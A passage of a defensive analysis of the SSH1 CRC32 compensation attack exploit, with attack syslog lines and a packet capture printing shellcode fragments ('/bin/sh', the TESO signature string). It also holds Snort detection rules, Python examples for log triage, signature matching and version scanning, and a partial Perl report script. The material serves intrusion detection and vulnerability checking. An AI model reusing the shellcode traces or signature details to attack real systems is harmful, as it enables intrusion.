Nov 1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected  
Nov 1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377  
Nov 1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected  
Nov 1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378  
Nov 1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected  
Nov 1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379  
Nov 1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected  
Nov 1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected  
Nov 1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380  
Nov 1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381  
Nov 1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected  
Nov 1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382  
Nov 1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected  
Nov 1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383  
Nov 1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384  
Nov 1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected  
Nov 1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385  
Nov 1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected  
Nov 1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386  
Nov 1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected  
Nov 1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387  
Nov 1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected  
Nov 1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388  
Nov 1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389  
Nov 1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390  
Nov 1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391  
Nov 1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392  
Nov 1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393  
Nov 1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input.  
Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394  
Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395  
Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396  
Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397  
Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398  
Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input.  
Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399  
Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400  
Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401  
Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
Note the last log entry: when the exploit succeeds, the authentication process stops,
because the shellcode's backdoor is now executing, and you can connect to its port and do
anything. The only catch is that the SSH daemon (at least SSH.com 1.2.31) times out because
authentication never completed, which closes the shell it spawned. In general there is a
10-minute window before the parent process of the listening shell is closed.
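The following is an added example, not code from the article or from Dittrich's write-up: a small triage pass over sshd1 syslog lines in the format shown above. It ties each "fatal:" message back to the connection that produced it through the sshd PID, counts detector hits and corrupted-check-byte errors per source address, and flags a source whose last connection in a burst ended with "Timeout before authentication", which is the pattern described above for a successful exploit. The SAMPLE_LOG lines are constructed for this example (same format as the article's log, different PIDs and ports), and the burst threshold of 10 connections is an arbitrary choice.

```python
# Added example, not part of the original article: a triage pass over sshd1
# syslog lines in the format shown above (SSH.com 1.2.31 on Red Hat Linux 6.0).
# It ties each "fatal:" message back to the connection that produced it through
# the sshd PID, counts detector hits and corrupted-check-byte errors per source
# address, and flags a source whose last connection died with "Timeout before
# authentication" after a burst of connections, which is the pattern the article
# describes for a successful exploit. The sample lines are constructed for this
# example in the same format as the article's log; the thresholds are arbitrary.
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"(?P<level>log|fatal): (?P<msg>.*)$"
)
CONN_RE = re.compile(r"Connection from (?P<ip>[\d.]+) port (?P<port>\d+)")

# substrings of the fatal messages seen in the article's log, and what they mean
SIGNATURES = {
    "crc32 compensation attack": "detector_hit",        # the detector itself fired
    "Corrupted check bytes on input": "corrupt_check",  # a failed brute-force attempt
    "Timeout before authentication": "auth_timeout",    # authentication never finished
}

# constructed sample, not the article's own log lines
SAMPLE_LOG = """\
Nov  1 18:46:14 victim sshd[9500]: log: Connection from 10.10.10.2 port 40000
Nov  1 18:46:20 victim sshd[9500]: fatal: Connection closed by remote host.
Nov  1 18:47:46 victim sshd[9600]: log: Connection from 10.10.10.10 port 33315
Nov  1 18:47:46 victim sshd[9601]: log: Connection from 10.10.10.10 port 33316
Nov  1 18:47:47 victim sshd[9602]: log: Connection from 10.10.10.10 port 33317
Nov  1 18:47:47 victim sshd[9603]: log: Connection from 10.10.10.10 port 33318
Nov  1 18:47:47 victim sshd[9603]: fatal: Local: Corrupted check bytes on input.
Nov  1 18:47:48 victim sshd[9604]: log: Connection from 10.10.10.10 port 33319
Nov  1 18:47:48 victim sshd[9605]: log: Connection from 10.10.10.10 port 33320
Nov  1 18:47:49 victim sshd[9606]: log: Connection from 10.10.10.10 port 33321
Nov  1 18:47:49 victim sshd[9606]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:47:49 victim sshd[9607]: log: Connection from 10.10.10.10 port 33322
Nov  1 18:47:50 victim sshd[9607]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:47:50 victim sshd[9608]: log: Connection from 10.10.10.10 port 33323
Nov  1 18:47:50 victim sshd[9609]: log: Connection from 10.10.10.10 port 33324
Nov  1 18:47:51 victim sshd[9610]: log: Connection from 10.10.10.10 port 33325
Nov  1 18:47:51 victim sshd[9611]: log: Connection from 10.10.10.10 port 33326
Nov  1 18:57:51 victim sshd[9611]: fatal: Timeout before authentication.
"""


def parse(lines):
    """Yield (pid, level, msg, src_ip) per line; src_ip is resolved through the PID."""
    pid_to_ip = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        pid, level, msg = m.group("pid"), m.group("level"), m.group("msg")
        c = CONN_RE.search(msg)
        if c:
            pid_to_ip[pid] = c.group("ip")
        yield pid, level, msg, pid_to_ip.get(pid)


def triage(lines, burst_threshold=10):
    """Return (per-source stats, findings) for the given syslog lines."""
    stats = defaultdict(lambda: {"connections": 0, "detector_hit": 0,
                                 "corrupt_check": 0, "auth_timeout": 0, "last_pid": None})
    last_event = {}  # pid -> signature name of its fatal message
    for pid, level, msg, ip in parse(lines):
        if ip is None:
            continue
        s = stats[ip]
        if level == "log" and CONN_RE.search(msg):
            s["connections"] += 1
            s["last_pid"] = pid
        elif level == "fatal":
            for needle, name in SIGNATURES.items():
                if needle in msg:
                    s[name] += 1
                    last_event[pid] = name
    findings = {}
    for ip, s in stats.items():
        reasons = []
        if s["detector_hit"]:
            reasons.append("crc32 compensation attack detector fired")
        if s["connections"] >= burst_threshold and s["corrupt_check"]:
            reasons.append("connection burst with corrupted check bytes (brute forcing)")
        if s["connections"] >= burst_threshold and last_event.get(s["last_pid"]) == "auth_timeout":
            reasons.append("last connection of the burst timed out before authentication: "
                           "look for a shell bound to a new listening port")
        if reasons:
            findings[ip] = reasons
    return dict(stats), findings


if __name__ == "__main__":
    stats, findings = triage(SAMPLE_LOG.splitlines())
    for ip, reasons in findings.items():
        print(ip, stats[ip])
        for r in reasons:
            print("   -", r)
```

On the constructed sample, 10.10.10.10 is reported with all three reasons and 10.10.10.2 is not reported at all. Because the timeout arrives roughly ten minutes after the burst, the timed-out connection is matched by PID rather than by timestamp order, which is also why the check belongs on the last connection rather than on the last log line.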
Network traffic analysis
===================== 
Tcpdump was used to capture the attack above; the capture, saved in sshdx.dump, can be
fed to an intrusion detection system to derive attack signatures. If your IDS does not
read tcpdump files, you can use "tcpreplay"[12] to replay the tcpdump data.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
# tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 &  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
This makes it easy to see the many connections to the SSH daemon; with the "ngrep"[5]
tool, the final connection and the brute-force traffic carrying the inserted SHELLCODE
can be identified:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
. . .  
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]  
  SSH-1.5-1.2.31.  
T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]  
  SSH-1.5-OpenSSH_2.2.0p1.  
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]  
  ............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h.....  
  ..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#.......\.j  
  W...O$....6.......$...V..;...U.@Y.K2.p<\..o..?..l.........*.p.K<s..,..  
  .@7.wBBy......1.i..%".....G*g.G.t(......M........[.......J......<.  
T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]  
  ............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....)  
  T.....|c...#W.\wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z  
  ....Q/.......8..  
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]  
  .........4..  
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]  
  ..W...2.......2.......2.......2.......2.......2.......2.......2.......  
  2.......2.......2.......2.......2.......2.......2.......2.......2 ....  
  ..2!......2$......2%......2(......2)......2,......2-......20......21..  
  ....24......25......28......29......2<......2=......2@......2A......2D  
  ......2E......2H......2I......2L......2M......2P......2Q......2T......  
  2U......2X......2Y......2\......2]......2`......2a......2d......2e....  
  ..2h......2i......2l......2m......2p......2q......2t......2u......2x..  
  ....2y......2|......2}......2.......2.......2.......2.......2.......2.  
  ......2.......2.......2.......2.......2.......2.......2.......2.......  
  2.......2.......2.......2.......2.......2.......2.......2.......2.....  
  ..2.......2.......2.......2.......2.......2.......2.......2.......2...  
  ....2.......2.......2.......2.......2.......2.......2.......2.......2.  
  ......2.......2.......2.......2.......2.......2.......2.......2.......  
  2.......2.......2.......2.......2.......2.......2.......2.......2.....  
  ..2.......2.......2.......2.......2.......2.......3.......3.......3...  
  ....3.......3.......3.......3.......3.......3.......3.......3.......3.  
  ......3.......3.......3.......3.......3 ......3!......3$......3%......  
  3(......3)......3,......3-......30......31......34......35......38....  
  ..39......3<......3=......3@......3A......3D......3E......3H......3I..  
  ....3L......3M......3P......3Q......3T......3U......3X......3Y......3\  
  ......3]......3`......3a......3d........1...p}.@  
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]  
  ......3i......3l......3m......3p......3q......3t......3u......3x......  
  3y......3|......3}......3.......3.......3.......3.......3.......3.....  
  ..3.......3.......3.......3.......3.......3.......3.......3.......3...  
  ....3.......3.......3.......3.......3.......3.......3.......3.......3.  
  ......3.......3.......3.......3.......3.......3.......3.......3.......  
  3.......3.......3.......3.......3.......3.......3.......3.......3.....  
  ..3.......3.......3.......3.......3.......3.......3.......3.......3...  
  ....3.......3.......3.......3.......3.......3.......3.......3.......3.  
  ......3.......3.......3.......3.......3.......4.......4.......4.......  
  4.......4.......4.......4.......4.......4.......4.......4.......4.....  
  ..4.......4.......4.......4.......4 ......4!......4$......4%......4(..  
  ....4)......4,......4-......40......41......44......45......48......49  
  ......4<......4=......4@......4A......4D......4E......4H......4I......  
  4L......4M......4P......4Q......4T......4U......4X......4Y......4\....  
  ..4]......4`......4a......4d......4e......4h......4i......4l......4m..  
  ....4p......4q......4t......4u......4x......4y......4|......4}......4.  
  ......4.......4.......4.......4.......4.......4.......4.......4.......  
  4.......4.......4.......4.......4.......4.......4.......4.......4.....  
  ..4.......4.......4.......4.......4.......4.......4.......4.......4...  
  ....4.......4.......4.......4.......4.......4.......4.......4.......4.  
  ......4.......4.......4.......4.........1...p}.@  
. . .  
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]  
  ......................................................................  
  ......................................................................  
  ......................................................................  
  ......................................................................  
  ......................................................................  
  ......................................................................  
  ......................................................................  
  ......................................................................  
  .....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E.  
  .E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U.......  
  ./bin/sh.h0h0h0, 7350, zip/TESO!......................................  
  ......................................................................  
  ......................................................................  
  ......................................................................  
  ......................................................................  
  ......................................................................  
  ......................................................................  
  ......................................................................  
  ......................................................................  
  ......................................................................  
  ........................................1...p}.@  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
For this exploit you can therefore match strings such as "h0h0h0, 7350, zip/TESO!" [7] and
the NOP sled. The following signatures were developed by Marty Roesch and Brian Caswell and
can be used with Snort v1.8 or later[6]:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \  
    (msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \  
    flags:A+; content:"/bin/sh"; \  
    reference:bugtraq,2347; reference:cve,CVE-2001-0144; \  
    classtype:shellcode-detect;)  
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \  
    (msg:"EXPLOIT ssh CRC32 overflow filler"; \  
    flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00|"; \  
    reference:bugtraq,2347; reference:cve,CVE-2001-0144; \  
    classtype:shellcode-detect;)  
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \  
    (msg:"EXPLOIT ssh CRC32 overflow NOOP"; \  
    flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; \  
    reference:bugtraq,2347; reference:cve,CVE-2001-0144; \  
    classtype:shellcode-detect;)  
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \  
    (msg:"EXPLOIT ssh CRC32 overflow"; \  
    flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; \  
    content:"|FF FF FF FF 00 00|"; offset:8; depth:14; \  
    reference:bugtraq,2347; reference:cve,CVE-2001-0144; \  
    classtype:shellcode-detect;)  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
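As an added example (not part of the original analysis and not Snort's own matching engine), the following Python reimplements the content tests of the four rules above, plus a fifth rule for the "h0h0h0, 7350, zip/TESO!" string the text suggests matching, and runs them over constructed payloads. It assumes Snort's meaning of `offset`/`depth` (the pattern is searched for inside `payload[offset:offset+depth]`), reduces the `$HOME_NET`/port 22 and `flags:A+` conditions to a destination-port check, and the sample byte strings (a NOP sled, a null filler run, a shellcode tail, and a first packet laid out to satisfy the fourth rule) are constructed here, not taken from the capture on this page.

```python
# Added example: Python re-implementation of the content tests in the Snort
# signatures above.  Not the page's code and not Snort itself.

# Each rule is (message, [(pattern, offset, depth), ...]).  offset/depth are
# taken with Snort's meaning: look for the pattern inside
# payload[offset:offset+depth]; (None, None) means anywhere in the payload.
RULES = [
    ("EXPLOIT ssh CRC32 overflow /bin/sh", [(b"/bin/sh", None, None)]),
    ("EXPLOIT ssh CRC32 overflow filler", [(b"\x00" * 13, None, None)]),
    ("EXPLOIT ssh CRC32 overflow NOOP", [(b"\x90" * 16, None, None)]),
    ("EXPLOIT ssh CRC32 overflow", [
        (bytes.fromhex("00015700000018"), 0, 7),   # |00 01 57 00 00 00 18| at start
        (bytes.fromhex("ffffffff0000"), 8, 14),    # |FF FF FF FF 00 00| in bytes 8..21
    ]),
    # Custom rule (assumption: the text suggests matching this string; it is
    # the tail of this exploit build's shellcode and trivial for an attacker
    # to change).
    ("CUSTOM ssh CRC32 TESO shellcode string",
     [(b"h0h0h0, 7350, zip/TESO!", None, None)]),
]


def content_match(payload, pattern, offset=None, depth=None):
    """One Snort 'content' test with optional offset/depth."""
    if offset is None:
        return pattern in payload
    end = None if depth is None else offset + depth
    return pattern in payload[offset:end]


def match_rules(payload, dport=22):
    """Return the messages of every rule whose content tests all match.

    The real rules also require an established TCP session (flags:A+) and a
    destination inside $HOME_NET; here only the destination port is checked.
    """
    if dport != 22:
        return []
    return [msg for msg, tests in RULES
            if all(content_match(payload, p, o, d) for p, o, d in tests)]


# Constructed test payloads (not taken from the capture on this page).
NOP_SLED = b"\x90" * 64 + b"\x31\xc0"
FILLER = b"A" * 8 + b"\x00" * 40 + b"B" * 8
SHELLCODE_TAIL = (b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
                  + b"\x00/bin/sh\x00h0h0h0, 7350, zip/TESO!")
# First packet laid out to satisfy the fourth rule: 7-byte header, one pad
# byte, then the six-byte pattern exactly at offset 8 (assumed layout).
EXPLOIT_FIRST_PACKET = (bytes.fromhex("00015700000018") + b"\x00"
                        + bytes.fromhex("ffffffff0000") + b"\x90" * 8)
BENIGN_BANNER = b"SSH-1.99-OpenSSH_2.9p2\n"

SAMPLES = {
    "nop_sled": NOP_SLED,
    "filler": FILLER,
    "shellcode_tail": SHELLCODE_TAIL,
    "exploit_first_packet": EXPLOIT_FIRST_PACKET,
    "benign_banner": BENIGN_BANNER,
}


def scan_samples(dport=22):
    """Run every rule over every sample; returns {sample_name: [messages]}."""
    return {name: match_rules(payload, dport) for name, payload in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print("%-22s %s" % (name, ", ".join(hits) or "-"))
```

Two things to keep in mind when deploying the rules: the capture on this page shows the target sshd listening on 10.10.10.3:2222, which a rule written for `$HOME_NET 22` never sees, so set the port to wherever sshd really listens; and the `/bin/sh`, filler and NOP rules describe shellcode in general rather than this exploit, while the TESO string is the most specific match and also the one an attacker changes first.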
Checking whether your hosts are vulnerable
==========================================
You can use Jeremy Mates' ssh_scan.pl [8] and Niels Provos' ScanSSH scanner [9]
to identify SSH servers and their version strings.
Russell Fulton has also published a script that works on Argus [10] logs; it is included in the appendix below.
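As an added example (not the page's own ssh-report script, and not the ssh_scan.pl or ScanSSH scanners), the following Python does the two steps this section describes: read the identification string an SSH server sends on connect, then group a list of scan results by version and flag the affected ones, using the input and report format that the ssh-report script in Appendix A documents. The status table holds only the versions whose status this page states (the sample report in Appendix A and the first rows of its %affected table); every other version comes out as "unknown" and the table should be extended from the advisories referenced in the script's header. `grab_banner` needs network access and is not exercised offline; the sample scan results are the example list from the Appendix A header.

```python
# Added example: SSH version-string classification and the two-level report
# described by Appendix A, in Python.  Not the page's script.
import re
import socket
from collections import OrderedDict

# Only versions whose status this page states; extend from the advisories
# cited in the ssh-report header.  Anything missing is reported as "unknown".
AFFECTED = {
    "SSH-1.4-1.2.14": "not affected",
    "SSH-1.4-1.2.15": "not affected",
    "SSH-1.5-1.2.31": "affected",
    "SSH-1.99-OpenSSH_2.1.1": "affected",
}

# Server identification string: "SSH-<protoversion>-<softwareversion>[ comments]"
BANNER_RE = re.compile(r"^SSH-(\d+\.\d+)-(\S+)")


def grab_banner(host, port=22, timeout=5.0):
    """Read the identification string an SSH server sends right after connect.

    Needs network access; the offline sample below does not call it.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        data = s.recv(256)
    return data.decode("ascii", "replace").strip()


def parse_banner(raw):
    """Return (protocol_version, software) or None if this is not an SSH banner."""
    m = BANNER_RE.match(raw.strip())
    return (m.group(1), m.group(2)) if m else None


def classify(banner):
    """Map a version string to 'affected' / 'not affected' / 'unknown'."""
    if parse_banner(banner) is None:
        return "unknown"          # custom banner, access control, not SSH ...
    return AFFECTED.get(banner.strip(), "unknown")


def parse_results(lines):
    """Parse 'ip hostname banner' lines, the input format of ssh-report."""
    rows = []
    for line in lines:
        parts = line.split(None, 2)
        if len(parts) == 3:
            ip, host, banner = parts
            rows.append((ip, host, banner.strip()))
    return rows


def build_report(rows, all_servers=False):
    """Group hosts by version string; by default keep only affected versions
    (the equivalent of running ssh-report without "-a")."""
    groups = OrderedDict()
    for ip, host, banner in rows:
        status = classify(banner)
        if not all_servers and status != "affected":
            continue
        groups.setdefault((banner, status), []).append("%s(%s)" % (host, ip))
    return groups


def format_report(groups):
    """Render the two-level break report: version header, then its hosts."""
    out = []
    for (banner, status), hosts in groups.items():
        out.append("%s (%s)" % (banner, status))
        out.extend(hosts)
        out.append("")
    return "\n".join(out)


# Sample scan results: the example list from the Appendix A header.
SAMPLE_RESULTS = """\
10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31
10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31
10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31
10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1
10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
"""


def sample_report(all_servers=False):
    return format_report(build_report(parse_results(SAMPLE_RESULTS.splitlines()),
                                      all_servers))


if __name__ == "__main__":
    print(sample_report())
```

Run it with `all_servers=True` (the "-a" of ssh-report) at least once: versions the table does not know come out as "unknown", and a host you cannot place is not the same as a host that is safe.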
---------------------------------------------------------------------------- 
References
==========
[1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen  
    http://www.all.net/ForensiX/plac.html  
[2] Netcat, by der Hobbit  
    http://www.l0pht.com/~weld/netcat/  
[3] Reverse Engineer's Query Tool  
    http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz  
[4] LiSt Open Files (lsof)  
    http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz  
[5] ngrep, by Jordan Ritter  
    http://www.packetfactory.net/projects/ngrep/  
[6] Snort  
    http://www.snort.org/  
[7] 7350.org / 7350  
    http://www.7350.org/  
    http://www.team-teso.org/about.php (see the bottom)  
[8] ssh_scan.pl, by Jeremy Mates  
    http://sial.org/code/perl/scripts/ssh_scan.pl.html  
[9] ScanSSH scanner, by Niels Provos  
    http://www.monkey.org/~provos/scanssh/  
[10] Argus - network traffic audit tool  
    http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1  
[11] tcpdump  
    http://staff.washington.edu/dittrich/misc/sshdx.dump  
[12] tcpreplay  
    http://packages.debian.org/testing/net/tcpreplay.html  
Appendix A  
==========  
Two scan scripts follow.
=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
#!/usr/bin/perl  
#  
# ssh-report  
#  
# Dave Dittrich <dittrich@cac.washington.edu>  
# Thu Nov 8 21:39:20 PST 2001  
#  
# Process output of scans for SSH servers, with version identifying  
# information, into two level break report format by SSH version.  
#  
# This script operates on a list of scan results that look  
# like this:  
#  
# % cat scanresults  
# 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31  
# 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31  
# 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2  
# 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31  
# 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2  
# 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1  
# 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2  
# 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2  
# 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2  
#  
# The resulting report (without the "-a" flag) will look like this:  
#  
# % ssh-report < scanresults  
#  
# SSH-1.5-1.2.31 (affected)  
# beavertail.dept.foo.edu(10.0.0.1)  
# lumpysoup.dept.foo.edu(10.0.0.2)  
# junebug.dept.foo.edu(10.0.0.4)  
#  
#  
# SSH-1.99-OpenSSH_2.1.1 (affected)  
# hobbes.dept.foo.edu(10.0.0.11)  
#  
# By default, this script will only report on those systems that  
# are running potentially vulnerable SSH servers. Use the "-a"  
# option to report on all servers. Use "grep -v" to filter out  
# hosts *before* you run them through this reporting script.  
#  
# SSH servers are considered "affected" if they are known, by being  
# listed in one or more of the following references, to have the crc32  
# compensation attack detector vulnerability:  
#  
# http://www.kb.cert.org/vuls/id/945216  
# http://www.securityfocus.com/bid/2347/  
# http://xforce.iss.net/alerts/advise100.php  
# http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm  
#  
# You also may need to adjust the logic below to lump systems  
# into the "Unknown" category correctly (e.g., if your server  
# has a custom version string, access control, etc.)  
#  
# The list below of servers and potential vulnerability was derived by  
# summarizing existing versions on a set of production networks and  
# using the advisories and reference material listed above. You  
# should update this list as new information is obtained, or if new  
# versions of the SSH server are found on your network.  
%affected = (  
'Unknown', 'unknown',  
'SSH-1.4-1.2.14', 'not affected',  
'SSH-1.4-1.2.15', 'not affected',  
'SSH-1.4-1.2.16', 'not affected',  